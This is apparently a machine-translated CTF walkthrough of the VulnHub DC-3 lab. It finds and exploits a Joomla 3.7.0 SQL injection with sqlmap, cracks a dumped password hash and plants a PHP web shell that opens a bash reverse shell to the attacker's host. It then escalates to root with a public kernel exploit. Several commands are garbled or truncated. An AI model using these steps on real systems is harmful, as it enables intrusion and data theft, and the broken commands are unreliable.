Penetration learning of DC-3 target


1, Environmental matching of target aircraft

Attack aircraft (KALI):

Target (DC-1): (unknown)

Target address: DC: 3.2 ~ VulnHub

2, Pre war preparation

two point one   IP address confirmation

Command: ARP scan - L   Scan all LAN devices (IP, MAC address and manufacturer information of all devices)

ARP scan command: it is an ARP command line scanning tool for system discovery (it can discover hidden devices in the local network). It can construct and send ARP requests to the specified IP address, and display all returned responses.
ARP scan can display all connected devices in the local network, even if they have firewalls. The firewall device can shield ping, but it cannot shield ARP packets.

2.2 port scanning

nmap -T4 -sV -O -A -p-
-T4(speed) -sV(Version scanning and open services) -O(operating system) -p-(All ports)

2.3 website scanning

use   dirb Find administrator login interface

two point four   Visit the web page for information  

There is no ssh service, but we have found the background login interface and can only raise the right step by step

2.5 view website structure

  We can see that CMS is joomla, which is a software system developed using PHP language and MySQL database

Three PHP CMS websites: Drupal, Wordpress and Joomla

3, Penetration start

1, flag1

1.1. Obtain the version of joomla professional tools

joomscan --url

Through Wappalyzer Firefox plug-in, it is found that the target web page CMS is   Joomla, use the special tool joomscan   To scan Joomla
The command to install the joomscan tool in kali is sudo apt get install joomscan

  Scan to target page   joomla version is 3.7.0

1.2. Vulnerability exploitation

Use the searchsploit tool to find the vulnerability in Joomla version 3.7.0

searchsploit Joomla 3.7.0


Confirm that the version is sql injection vulnerability

1.3. Vulnerability query

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt View vulnerability file

  1.4 blasting

sqlmap -u "[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

 -- dbs database     Guess user data in joomlab

sqlmap -u "[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

-D "joomladb" --tables specifies all tables in the database joomladb     We found the user table

sqlmap -u "[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

-D "joomladb" - t "##u users" -- columns specifies the user table field in joomladb database

sqlmap -u "[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C id,nmae,password,username --dump -p list[fullordering]

sqlmap -u "[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C id,nmae,password,username --dump -p list[fullordering]

 - D "joomladb" -T "#__users" -C id,nmae,password,username     Explodes the specified field

We found the user name and password, but the password is encrypted

1.5 password cracking

Create a new file, write in the password, and use john to crack the password


  Find password snoopy

Login background

  Upload a one sentence script in index.php, enable kali to listen, and visit the index web page again to execute the script

system("bash -c 'bash -i >& /dev/tcp/192.168.226,128/1212 0>&1' ");
?> index and uploaded scripts are in the beez3 directory


View version information and find vulnerability Library

lsb_release -a
cat /etc/issue

  Copy vulnerability information to local

searchsploit ubuntu 16.04
cp /usr/share/exploitdb/exploits/linux/local/39772.txt /home/kali/Desktop/
cat 39772.txt


3. Infiltration and right raising

unzip  #Unzip the file
cd 39772
tar -xvf exploit.tar  #Unzip the exploit authorization script tar package
cd ebpf_mapfd_doubleput_exploit


./ #Execute the script and compile the file
./doubleput  #Executive right raising document

cd /root
cat the-flag.txt



Tags: penetration test kali

Posted on Fri, 01 Oct 2021 15:09:41 -0400 by Tr4mpldUndrfooT